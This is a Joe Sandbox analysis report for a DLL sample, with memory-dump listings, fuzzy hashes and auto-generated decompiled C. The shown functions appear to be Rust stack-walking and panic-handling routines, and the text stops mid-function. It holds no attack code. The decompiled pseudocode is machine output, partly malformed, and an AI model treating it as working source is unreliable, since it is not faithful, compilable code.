Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eb6665ddb3350983e42d1cbc670fa1f7b7e34ee61cedf1b9ad9aa5777005a93
Instruction ID: 5dba82511e0865b80e2facbdfb33bd03f28523d60be2d466328ba47686a75120
Opcode Fuzzy Hash: 6eb6665ddb3350983e42d1cbc670fa1f7b7e34ee61cedf1b9ad9aa5777005a93
Instruction Fuzzy Hash: 2DE08C32A21239EBCB15CBC8C910A8AB3ECFB49B00B510896F901E3600E274DE00C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE12CB, Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8280ca142bc1b3d81a1ec9e0318d957c7d25c74bfd8627c95e038b2adada9f26
Instruction ID: a8b9a3002ba5473c7488201aecb647d620e8ba0156fa786002d13f89491927c3
Opcode Fuzzy Hash: 8280ca142bc1b3d81a1ec9e0318d957c7d25c74bfd8627c95e038b2adada9f26
Instruction Fuzzy Hash: C4C08C3400090146CE0E8AD486703A43368E385782F80188CC8028BE45E61E9C8BD700

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCDD30, Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 451
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6ECCDD30(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, long _a8) {
				void* _v16;
				char _v1456;
				void* __ebp;
				void _t191;
				void* _t194;
				long _t195;
				signed int _t200;
				void* _t201;
				void* _t204;
				void* _t205;
				long _t206;
				char _t208;
				void* _t217;
				void* _t218;
				void* _t221;
				void* _t227;
				void* _t229;
				void* _t233;
				void* _t235;
				void* _t241;
				void* _t243;
				void* _t244;
				void* _t246;
				void* _t250;
				void* _t252;
				long _t260;
				long _t262;
				void* _t263;
				void* _t264;
				char _t265;
				void* _t267;
				void* _t274;
				void* _t284;
				void* _t288;
				long _t291;
				WCHAR* _t293;
				void* _t294;
				WCHAR* _t304;
				long _t305;
				void* _t307;
				void* _t308;
				intOrPtr _t310;
				intOrPtr _t313;
				signed int _t315;
				intOrPtr _t317;
				void* _t318;
				void* _t322;
				void* _t324;

				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t317 = (_t315 & 0xfffffff0) - 0x5b0;
				_t310 = _t317;
				 *((intOrPtr*)(_t310 + 0x598)) = _t313;
				 *((intOrPtr*)(_t310 + 0x59c)) = _t317;
				 *(_t310 + 0x5a8) = 0xffffffff;
				 *((intOrPtr*)(_t310 + 0x5a4)) = E6ECD39E0;
				 *((intOrPtr*)(_t310 + 0x5a0)) =  *[fs:0x0];
				 *[fs:0x0] = _t310 + 0x5a0;
				_t191 =  *_a4;
				 *(_t310 + 0x28) = _t191;
				 *(_t310 + 0xe) = _t191;
				E6ECDE9D0(__edi, _t310 + 0x190, 0, 0x400);
				_t318 = _t317 + 0xc;
				_t194 =  *0x6ed0f8cc; // 0x2
				_t262 = 0x200;
				 *(_t310 + 0x24) = 0;
				 *(_t310 + 0x2c) = _t194;
				 *(_t310 + 0x30) = 0;
				 *(_t310 + 0x14) = _t194;
				 *(_t310 + 0x34) = 0;
				 *(_t310 + 0x10) = 0x200;
				if(0x200 >= 0x201) {
					L4:
					_t291 =  *(_t310 + 0x24);
					_t263 = _t262 - _t291;
					__eflags =  *(_t310 + 0x30) - _t291 - _t263;
					if( *(_t310 + 0x30) - _t291 < _t263) {
						 *(_t310 + 0x5a8) = 0;
						_t274 = _t310 + 0x2c;
						E6ECE9A30(_t274, _t291, _t263);
						_t318 = _t318 + 4;
						 *(_t310 + 0x14) =  *(_t310 + 0x2c);
					}
					_t262 =  *(_t310 + 0x10);
					_t304 =  *(_t310 + 0x14);
					 *(_t310 + 0x34) = _t262;
					 *(_t310 + 0x24) = _t262;
					 *(_t310 + 0x20) = _t304;
					 *(_t310 + 0x1c) = _t262;
				} else {
					L7:
					_t304 = _t310 + 0x190;
					 *(_t310 + 0x1c) = 0x200;
					 *(_t310 + 0x20) = _t304;
				}
				L8:
				SetLastError(0);
				_t195 = GetCurrentDirectoryW(_t262, _t304);
				_t305 = _t195;
				if(_t195 != 0 || GetLastError() == 0) {
					if(_t305 != _t262 || GetLastError() != 0x7a) {
						__eflags = _t305 -  *(_t310 + 0x10);
						_t262 = _t305;
						if(_t305 <  *(_t310 + 0x10)) {
							_t292 =  *(_t310 + 0x1c);
							 *(_t310 + 0x5a8) = 0;
							__eflags = _t305 -  *(_t310 + 0x1c);
							if(__eflags > 0) {
								E6ECE9470(_t262, _t305, _t292, _t305, _t310, __eflags, 0x6ed106e0);
								goto L70;
							} else {
								_t293 =  *(_t310 + 0x20);
								_t274 = _t310 + 0x70;
								_push(_t305);
								E6ECD0D10(_t262, _t274, _t293, _t305, _t310);
								_t318 = _t318 + 4;
								asm("movsd xmm0, [esi+0x70]");
								_t264 = 0;
								 *(_t310 + 0x48) =  *(_t310 + 0x78);
								asm("movsd [esi+0x40], xmm0");
								_t200 =  *(_t310 + 0x30);
								__eflags = _t200;
								if(_t200 != 0) {
									goto L18;
								} else {
								}
								goto L21;
							}
						} else {
							__eflags = _t262 - 0x201;
							 *(_t310 + 0x10) = _t262;
							if(_t262 < 0x201) {
								goto L7;
							} else {
								goto L4;
							}
							goto L8;
						}
					} else {
						_t262 =  *(_t310 + 0x10) +  *(_t310 + 0x10);
						 *(_t310 + 0x10) = _t262;
						if(_t262 >= 0x201) {
							goto L4;
						} else {
							goto L7;
						}
						goto L8;
					}
				} else {
					_t260 = GetLastError();
					_t264 = 1;
					 *(_t310 + 0x44) = _t260;
					 *(_t310 + 0x40) = 0;
					_t200 =  *(_t310 + 0x30);
					__eflags = _t200;
					if(_t200 != 0) {
						L18:
						__eflags =  *(_t310 + 0x14);
						if( *(_t310 + 0x14) != 0) {
							__eflags = _t200 & 0x7fffffff;
							if((_t200 & 0x7fffffff) != 0) {
								HeapFree( *0x6ed1e128, 0,  *(_t310 + 0x14));
							}
						}
					}
					L21:
					__eflags = _t264;
					if(_t264 == 0) {
						_t201 =  *(_t310 + 0x40);
						_t274 =  *(_t310 + 0x44);
						_t293 =  *(_t310 + 0x48);
						_t265 =  *(_t310 + 0x28);
						 *(_t310 + 0x5a8) = 2;
					} else {
						__eflags =  *(_t310 + 0x40) - 3;
						if( *(_t310 + 0x40) == 3) {
							_t288 =  *(_t310 + 0x44);
							 *(_t310 + 0x10) = _t288;
							 *(_t310 + 0x5a8) = 1;
							 *((intOrPtr*)( *((intOrPtr*)(_t288 + 4))))( *_t288);
							_t318 = _t318 + 4;
							_t250 =  *(_t310 + 0x10);
							_t274 =  *(_t250 + 4);
							__eflags =  *(_t274 + 4);
							if( *(_t274 + 4) != 0) {
								_t252 =  *_t250;
								__eflags =  *((intOrPtr*)(_t274 + 8)) - 9;
								if( *((intOrPtr*)(_t274 + 8)) >= 9) {
									_t252 =  *(_t252 - 4);
								}
								HeapFree( *0x6ed1e128, 0, _t252);
								_t250 =  *(_t310 + 0x44);
							}
							HeapFree( *0x6ed1e128, 0, _t250);
						}
						_t265 =  *(_t310 + 0xe);
						_t201 = 0;
						 *(_t310 + 0x5a8) = 2;
					}
					 *((char*)(_t310 + 0x68)) = _t265;
					 *(_t310 + 0x5c) = _t201;
					 *(_t310 + 0x64) = _t293;
					 *(_t310 + 0x60) = _t274;
					 *(_t310 + 0x190) = 0x6ed0fdd8;
					 *(_t310 + 0x194) = 1;
					 *(_t310 + 0x198) = 0;
					 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6ed0f570;
					 *(_t310 + 0x1a4) = 0;
					_t294 =  *(_a8 + 0x1c);
					_push(_t310 + 0x190);
					_t204 = E6ECC2150( *((intOrPtr*)(_a8 + 0x18)), _t294);
					_t322 = _t318 + 4;
					__eflags = _t204;
					if(_t204 != 0) {
						L50:
						_t205 =  *(_t310 + 0x5c);
						__eflags = _t205;
						if(_t205 != 0) {
							__eflags =  *(_t310 + 0x60);
							if( *(_t310 + 0x60) != 0) {
								HeapFree( *0x6ed1e128, 0, _t205);
							}
						}
						_t206 = 1;
						goto L54;
					} else {
						_t208 =  *(_t310 + 0xe);
						 *(_t310 + 0x6c) = 0;
						 *((char*)(_t310 + 0xf)) = 0;
						 *(_t310 + 0x40) = _a8;
						 *(_t310 + 0x44) = 0;
						__eflags = _t208;
						 *((char*)(_t310 + 0x50)) = _t208;
						 *(_t310 + 0x2c) = _t310 + 0xe;
						 *(_t310 + 0x48) = _t310 + 0x5c;
						 *((intOrPtr*)(_t310 + 0x4c)) = 0x6ed0fde0;
						 *(_t310 + 0x1b) = _t208 != 0;
						 *(_t310 + 0x30) = _t310 + 0x6c;
						 *(_t310 + 0x34) = _t310 + 0x1b;
						 *((intOrPtr*)(_t310 + 0x38)) = _t310 + 0xf;
						 *((intOrPtr*)(_t310 + 0x3c)) = _t310 + 0x40;
						 *(_t310 + 0x10) = GetCurrentProcess();
						 *(_t310 + 0x24) = GetCurrentThread();
						_t307 = _t310 + 0x190;
						E6ECDE9D0(_t307, _t307, 0, 0x2d0);
						_t324 = _t322 + 0xc;
						_push(_t307);
						L6ECDC5AE();
						_t217 = E6ECCE4E0(_t265, _t307, _t310);
						__eflags = _t217;
						if(_t217 == 0) {
							_t308 =  *0x6ed1e148; // 0x0
							 *(_t310 + 0x58) = _t294;
							__eflags = _t308;
							if(_t308 == 0) {
								_t218 = GetProcAddress( *0x6ed1e130, "SymFunctionTableAccess64");
								__eflags = _t218;
								if(__eflags == 0) {
									 *(_t310 + 0x5a8) = 3;
									E6ECE94E0(_t265, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ed10ad0);
									goto L70;
								} else {
									_t308 = _t218;
									 *0x6ed1e148 = _t218;
									_t267 =  *0x6ed1e14c; // 0x0
									__eflags = _t267;
									if(_t267 != 0) {
										goto L41;
									} else {
										goto L39;
									}
								}
							} else {
								_t267 =  *0x6ed1e14c; // 0x0
								__eflags = _t267;
								if(_t267 != 0) {
									L41:
									 *(_t310 + 0x20) = GetCurrentProcess();
									_t221 =  *0x6ed1e158; // 0x0
									 *(_t310 + 0x1c) = _t308;
									 *(_t310 + 0x14) = _t267;
									__eflags = _t221;
									if(_t221 != 0) {
										L44:
										 *(_t310 + 0x28) = _t221;
										 *(_t310 + 0x74) = 0;
										 *(_t310 + 0x70) = 0;
										E6ECDE9D0(_t308, _t310 + 0x80, 0, 0x10c);
										_t324 = _t324 + 0xc;
										 *(_t310 + 0x7c) = 0;
										 *(_t310 + 0x78) =  *(_t310 + 0x248);
										 *(_t310 + 0x84) = 3;
										 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
										 *(_t310 + 0xac) = 0;
										 *(_t310 + 0xb4) = 3;
										 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
										 *(_t310 + 0x9c) = 0;
										 *(_t310 + 0xa4) = 3;
										while(1) {
											_t227 =  *(_t310 + 0x28)(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0, 0);
											__eflags = _t227 - 1;
											if(_t227 != 1) {
												goto L47;
											}
											 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
											 *(_t310 + 0x5a8) = 3;
											_t235 = E6ECCE6E0(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
											_t308 =  *(_t310 + 0x1c);
											_t267 =  *(_t310 + 0x14);
											__eflags = _t235;
											if(_t235 != 0) {
												continue;
											}
											goto L47;
										}
										goto L47;
									} else {
										_t221 = GetProcAddress( *0x6ed1e130, "StackWalkEx");
										__eflags = _t221;
										if(_t221 == 0) {
											E6ECDE9D0(_t308, _t310 + 0x80, 0, 0x100);
											_t324 = _t324 + 0xc;
											 *(_t310 + 0x74) = 0;
											 *(_t310 + 0x70) = 1;
											 *(_t310 + 0x188) = 0;
											 *(_t310 + 0x7c) = 0;
											 *(_t310 + 0x78) =  *(_t310 + 0x248);
											 *(_t310 + 0x84) = 3;
											 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
											 *(_t310 + 0xac) = 0;
											 *(_t310 + 0xb4) = 3;
											 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
											 *(_t310 + 0x9c) = 0;
											 *(_t310 + 0xa4) = 3;
											do {
												_t284 =  *0x6ed1e144; // 0x0
												__eflags = _t284;
												if(_t284 != 0) {
													L63:
													_t241 =  *_t284(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0);
													__eflags = _t241 - 1;
													if(_t241 != 1) {
														L47:
														ReleaseMutex( *(_t310 + 0x58));
														__eflags =  *((char*)(_t310 + 0xf));
														if( *((char*)(_t310 + 0xf)) != 0) {
															goto L50;
														} else {
															goto L48;
														}
														goto L54;
													} else {
														goto L64;
													}
												} else {
													_t244 = GetProcAddress( *0x6ed1e130, "StackWalk64");
													__eflags = _t244;
													if(__eflags == 0) {
														 *(_t310 + 0x5a8) = 3;
														E6ECE94E0(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ed10ad0);
														goto L70;
													} else {
														_t284 = _t244;
														 *0x6ed1e144 = _t244;
														goto L63;
													}
												}
												goto L71;
												L64:
												 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
												 *(_t310 + 0x5a8) = 3;
												_t243 = E6ECCE6E0(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
												_t308 =  *(_t310 + 0x1c);
												_t267 =  *(_t310 + 0x14);
												__eflags = _t243;
											} while (_t243 != 0);
											goto L47;
										} else {
											 *0x6ed1e158 = _t221;
											goto L44;
										}
									}
								} else {
									L39:
									_t246 = GetProcAddress( *0x6ed1e130, "SymGetModuleBase64");
									__eflags = _t246;
									if(__eflags == 0) {
										 *(_t310 + 0x5a8) = 3;
										E6ECE94E0(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ed10ad0);
										L70:
										asm("ud2");
										_push(_t313);
										return E6ECCE6D0( *((intOrPtr*)( &_v1456 + 0x58)));
									} else {
										_t267 = _t246;
										 *0x6ed1e14c = _t246;
										goto L41;
									}
								}
							}
						} else {
							__eflags =  *((char*)(_t310 + 0xf));
							if( *((char*)(_t310 + 0xf)) != 0) {
								goto L50;
							} else {
								L48:
								__eflags =  *(_t310 + 0xe);
								if( *(_t310 + 0xe) != 0) {
									L55:
									_t229 =  *(_t310 + 0x5c);
									__eflags = _t229;
									if(_t229 != 0) {
										__eflags =  *(_t310 + 0x60);
										if( *(_t310 + 0x60) != 0) {
											HeapFree( *0x6ed1e128, 0, _t229);
										}
									}
									_t206 = 0;
								} else {
									 *(_t310 + 0x190) = 0x6ed0fe4c;
									 *(_t310 + 0x194) = 1;
									 *(_t310 + 0x198) = 0;
									 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6ed0f570;
									 *(_t310 + 0x1a4) = 0;
									 *(_t310 + 0x5a8) = 2;
									_push(_t310 + 0x190);
									_t233 = E6ECC2150( *((intOrPtr*)(_a8 + 0x18)),  *(_a8 + 0x1c));
									__eflags = _t233;
									if(_t233 == 0) {
										goto L55;
									} else {
										goto L50;
									}
								}
							}
							L54:
							 *[fs:0x0] =  *((intOrPtr*)(_t310 + 0x5a0));
							return _t206;
						}
					}
				}
				L71:
			}

0x6eccdd33
0x6eccdd34
0x6eccdd35
0x6eccdd39
0x6eccdd3f
0x6eccdd41
0x6eccdd47
0x6eccdd4d
0x6eccdd57
0x6eccdd71
0x6eccdd77
0x6eccdd7e
0x6eccdd80
0x6eccdd83
0x6eccdd94
0x6eccdd99
0x6eccdd9c
0x6eccdda1
0x6eccdda6
0x6eccddad
0x6eccddb0
0x6eccddb7
0x6eccddba
0x6eccddc7
0x6eccddca
0x6eccdde6
0x6eccdde6
0x6eccddec
0x6eccddf0
0x6eccddf2
0x6eccddf4
0x6eccddfe
0x6eccde02
0x6eccde07
0x6eccde0d
0x6eccde0d
0x6eccde10
0x6eccde13
0x6eccde16
0x6eccde19
0x6eccde1c
0x6eccde1f
0x6eccddcc
0x6eccde30
0x6eccde30
0x6eccde36
0x6eccde3d
0x6eccde3d
0x6eccde40
0x6eccde42
0x6eccde4a
0x6eccde50
0x6eccde54
0x6eccde62
0x6eccddd0
0x6eccddd3
0x6eccddd5
0x6eccde8d
0x6eccde90
0x6eccde9a
0x6eccde9c
0x6ecce3b8
0x00000000
0x6eccdea2
0x6eccdea2
0x6eccdea5
0x6eccdea8
0x6eccdea9
0x6eccdeae
0x6eccdeb4
0x6eccdeb9
0x6eccdebb
0x6eccdebe
0x6eccdec3
0x6eccdec6
0x6eccdec8
0x00000000
0x00000000
0x6eccdeca
0x00000000
0x6eccdec8
0x6eccdddb
0x6eccdddb
0x6eccdde1
0x6eccdde4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6eccdde4
0x6eccde77
0x6eccde7a
0x6eccde82
0x6eccde85
0x00000000
0x6eccde8b
0x00000000
0x6eccde8b
0x00000000
0x6eccde85
0x6eccdecc
0x6eccdecc
0x6eccded2
0x6eccded4
0x6eccded7
0x6eccdede
0x6eccdee1
0x6eccdee3
0x6eccdee5
0x6eccdee5
0x6eccdee9
0x6eccdeeb
0x6eccdef0
0x6eccdefd
0x6eccdefd
0x6eccdef0
0x6eccdee9
0x6eccdf02
0x6eccdf02
0x6eccdf04
0x6eccdf6e
0x6eccdf71
0x6eccdf74
0x6eccdf77
0x6eccdf7a
0x6eccdf06
0x6eccdf06
0x6eccdf0a
0x6eccdf0c
0x6eccdf11
0x6eccdf17
0x6eccdf22
0x6eccdf24
0x6eccdf27
0x6eccdf2a
0x6eccdf2d
0x6eccdf31
0x6eccdf33
0x6eccdf35
0x6eccdf39
0x6eccdf3b
0x6eccdf3b
0x6eccdf47
0x6eccdf4c
0x6eccdf4c
0x6eccdf58
0x6eccdf58
0x6eccdf5d
0x6eccdf60
0x6eccdf62
0x6eccdf62
0x6eccdf84
0x6eccdf87
0x6eccdf8d
0x6eccdf90
0x6eccdf93
0x6eccdf9d
0x6eccdfa7
0x6eccdfb1
0x6eccdfbb
0x6eccdfc8
0x6eccdfd1
0x6eccdfd2
0x6eccdfd7
0x6eccdfda
0x6eccdfdc
0x6ecce255
0x6ecce255
0x6ecce258
0x6ecce25a
0x6ecce25c
0x6ecce260
0x6ecce26b
0x6ecce26b
0x6ecce260
0x6ecce270
0x00000000
0x6eccdfe2
0x6eccdfe2
0x6eccdfe8
0x6eccdfef
0x6eccdff3
0x6eccdff6
0x6eccdffd
0x6eccdfff
0x6ecce008
0x6ecce00e
0x6ecce011
0x6ecce018
0x6ecce01c
0x6ecce022
0x6ecce028
0x6ecce02e
0x6ecce036
0x6ecce03f
0x6ecce049
0x6ecce050
0x6ecce055
0x6ecce058
0x6ecce059
0x6ecce05e
0x6ecce063
0x6ecce065
0x6ecce076
0x6ecce07c
0x6ecce07f
0x6ecce081
0x6ecce09a
0x6ecce0a0
0x6ecce0a2
0x6ecce3e5
0x6ecce3fe
0x00000000
0x6ecce0a8
0x6ecce0a8
0x6ecce0aa
0x6ecce0af
0x6ecce0b5
0x6ecce0b7
0x00000000
0x00000000
0x00000000
0x00000000
0x6ecce0b7
0x6ecce083
0x6ecce083
0x6ecce089
0x6ecce08b
0x6ecce0d9
0x6ecce0de
0x6ecce0e1
0x6ecce0e6
0x6ecce0e9
0x6ecce0ec
0x6ecce0ee
0x6ecce10e
0x6ecce10e
0x6ecce117
0x6ecce11e
0x6ecce12d
0x6ecce132
0x6ecce147
0x6ecce14e
0x6ecce151
0x6ecce15b
0x6ecce161
0x6ecce16b
0x6ecce175
0x6ecce17b
0x6ecce185
0x6ecce190
0x6ecce1ae
0x6ecce1b1
0x6ecce1b4
0x00000000
0x00000000
0x6ecce1c6
0x6ecce1cc
0x6ecce1d6
0x6ecce1db
0x6ecce1de
0x6ecce1e1
0x6ecce1e3
0x00000000
0x00000000
0x00000000
0x6ecce1e3
0x00000000
0x6ecce0f0
0x6ecce0fb
0x6ecce101
0x6ecce103
0x6ecce2b4
0x6ecce2b9
0x6ecce2ce
0x6ecce2d5
0x6ecce2dc
0x6ecce2e6
0x6ecce2ed
0x6ecce2f0
0x6ecce2fa
0x6ecce300
0x6ecce30a
0x6ecce314
0x6ecce31a
0x6ecce324
0x6ecce330
0x6ecce330
0x6ecce336
0x6ecce338
0x6ecce356
0x6ecce372
0x6ecce374
0x6ecce377
0x6ecce1e5
0x6ecce1e8
0x6ecce1ed
0x6ecce1f1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ecce33a
0x6ecce345
0x6ecce34b
0x6ecce34d
0x6ecce3c2
0x6ecce3db
0x00000000
0x6ecce34f
0x6ecce34f
0x6ecce351
0x00000000
0x6ecce351
0x6ecce34d
0x00000000
0x6ecce37d
0x6ecce38d
0x6ecce393
0x6ecce39d
0x6ecce3a2
0x6ecce3a5
0x6ecce3a8
0x6ecce3a8
0x00000000
0x6ecce109
0x6ecce109
0x00000000
0x6ecce109
0x6ecce103
0x6ecce08d
0x6ecce0b9
0x6ecce0c4
0x6ecce0ca
0x6ecce0cc
0x6ecce408
0x6ecce421
0x6ecce429
0x6ecce429
0x6ecce430
0x6ecce44c
0x6ecce0d2
0x6ecce0d2
0x6ecce0d4
0x00000000
0x6ecce0d4
0x6ecce0cc
0x6ecce08b
0x6ecce067
0x6ecce067
0x6ecce06b
0x00000000
0x6ecce071
0x6ecce1f3
0x6ecce1f3
0x6ecce1f7
0x6ecce287
0x6ecce287
0x6ecce28a
0x6ecce28c
0x6ecce28e
0x6ecce292
0x6ecce29d
0x6ecce29d
0x6ecce292
0x6ecce2a2
0x6ecce1fd
0x6ecce200
0x6ecce20a
0x6ecce214
0x6ecce21e
0x6ecce228
0x6ecce232
0x6ecce248
0x6ecce249
0x6ecce251
0x6ecce253
0x00000000
0x00000000
0x00000000
0x00000000
0x6ecce253
0x6ecce1f7
0x6ecce272
0x6ecce278
0x6ecce286
0x6ecce286
0x6ecce065
0x6eccdfdc
0x00000000

APIs

SetLastError.KERNEL32(00000000), ref: 6ECCDE42
GetCurrentDirectoryW.KERNEL32(?,?), ref: 6ECCDE4A
GetLastError.KERNEL32 ref: 6ECCDE56
GetLastError.KERNEL32 ref: 6ECCDE68
GetLastError.KERNEL32 ref: 6ECCDECC
HeapFree.KERNEL32(00000000,00000000), ref: 6ECCDEFD
HeapFree.KERNEL32(00000000,?), ref: 6ECCDF47
HeapFree.KERNEL32(00000000,?), ref: 6ECCDF58
GetCurrentProcess.KERNEL32(?), ref: 6ECCE031
GetCurrentThread.KERNEL32 ref: 6ECCE039
RtlCaptureContext.KERNEL32(?), ref: 6ECCE059
GetProcAddress.KERNEL32(SymFunctionTableAccess64,?), ref: 6ECCE09A
GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6ECCE0C4
GetCurrentProcess.KERNEL32 ref: 6ECCE0D9
GetProcAddress.KERNEL32(StackWalkEx), ref: 6ECCE0FB
ReleaseMutex.KERNEL32(?), ref: 6ECCE1E8
HeapFree.KERNEL32(00000000,?), ref: 6ECCE26B
HeapFree.KERNEL32(00000000,?,?), ref: 6ECCE29D
GetProcAddress.KERNEL32(StackWalk64), ref: 6ECCE345

Strings

StackWalkEx, xrefs: 6ECCE0F0
StackWalk64, xrefs: 6ECCE33A
SymFunctionTableAccess64, xrefs: 6ECCE08F
called `Option::unwrap()` on a `None` value, xrefs: 6ECCE3CC, 6ECCE3EF, 6ECCE412
SymGetModuleBase64, xrefs: 6ECCE0B9

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: FreeHeap$AddressCurrentErrorLastProc$Process$CaptureContextDirectoryMutexReleaseThread
String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$called `Option::unwrap()` on a `None` value
API String ID: 1381040140-1036201984
Opcode ID: 47293bbf609193f17e372cc2682563cd077d67c4c60e9ffe8c01fa088e2682f7
Instruction ID: 59ca00644ff7b29a874786afd50b1211f17e3d5440a6328dcb9df1749f708e44
Opcode Fuzzy Hash: 47293bbf609193f17e372cc2682563cd077d67c4c60e9ffe8c01fa088e2682f7
Instruction Fuzzy Hash: DB124AB0500B009FE761CFA5C895B93BBF4BB4A708F10491DE9AA87B91E771B449CF52

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC700, Relevance: 32.0, APIs: 14, Strings: 4, Instructions: 477
memoryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6ECCC700(long _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t190;
				void* _t194;
				void _t195;
				intOrPtr* _t196;
				signed int _t197;
				signed int _t199;
				char* _t201;
				long _t202;
				long _t203;
				void* _t204;
				void* _t205;
				long _t206;
				void _t209;
				void _t210;
				void* _t219;
				void* _t222;
				long _t226;
				void* _t235;
				void* _t245;
				void* _t247;
				void* _t248;
				char** _t251;
				char** _t252;
				void* _t256;
				void* _t260;
				void _t264;
				char _t265;
				signed char _t267;
				void _t270;
				intOrPtr _t273;
				void* _t275;
				char* _t276;
				void _t277;
				void* _t280;
				intOrPtr _t291;
				intOrPtr _t295;
				void _t298;
				long _t302;
				void* _t307;
				void* _t308;
				void* _t309;
				signed int _t310;
				signed int _t312;
				void* _t318;
				intOrPtr* _t324;
				long _t326;
				void* _t327;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t335;
				intOrPtr _t336;
				void* _t347;
				void* _t360;
				long _t361;

				_v32 = _t336;
				_v20 = 0xffffffff;
				_v24 = E6ECD39A0;
				_t264 = _t270;
				_t332 = 1;
				_t330 = _t307;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				asm("lock xadd [0x6ed1e120], esi");
				_t190 = E6ECCD000(_t264, _t330);
				_t337 = _t190;
				if(_t190 == 0) {
					_t190 = E6ECE95A0(_t264,  &M6ED0F8F7, 0x46, _t337,  &_v68, 0x6ed0f870, 0x6ed0f9bc);
					_t336 = _t336 + 0xc;
					asm("ud2");
				}
				_t308 = _a8;
				_t273 =  *_t190 + 1;
				 *_t190 = _t273;
				if(_t332 < 0 || _t273 >= 3) {
					__eflags = _t273 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6ed0f570;
						_v120 = 0x6ed0f824;
						_v68 = 0x6ed10260;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t308;
						_t309 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6ECC2470;
						_v52 =  &_v80;
						_v48 = 1;
						_t194 = E6ECCD0F0( &_v100, __eflags);
						__eflags = _t194 - 3;
						if(_t194 == 3) {
							_v20 = 0;
							_v36 = _t309;
							 *((intOrPtr*)( *((intOrPtr*)(_t309 + 4))))( *_t309);
							_t336 = _t336 + 4;
							L11:
							_t332 = _v36;
							_t302 =  *(_t332 + 4);
							__eflags =  *(4 + _t302);
							if( *(4 + _t302) != 0) {
								_t256 =  *_t332;
								__eflags =  *((intOrPtr*)(_t302 + 8)) - 9;
								if( *((intOrPtr*)(_t302 + 8)) >= 9) {
									_t256 =  *(_t256 - 4);
								}
								HeapFree( *0x6ed1e128, 0, _t256);
							}
							_t194 = HeapFree( *0x6ed1e128, 0, _t332);
						}
						goto L16;
					}
					_t327 =  &_v68;
					_v68 = 0x6ed10224;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6ed0f570;
					_v120 = 0;
					_v124 = 0;
